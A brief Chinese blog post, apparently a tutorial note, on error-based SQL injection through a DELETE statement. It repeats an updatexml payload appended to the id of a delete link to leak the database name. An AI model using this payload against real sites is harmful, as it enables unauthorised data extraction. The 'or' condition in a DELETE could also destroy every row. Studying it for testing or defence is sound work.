SQL注入之delete注入
2019-02-26 本文已影响15人
原来是老王


delete注入:
delete from message where id=63 or updatexml(2,concat(0x7e,(database())),0)
找到删除链接:
payload
or updatexml(2,concat(0x7e,(database())),0)

delete from message where id=63 or updatexml(2,concat(0x7e,(database())),0)
or updatexml(2,concat(0x7e,(database())),0)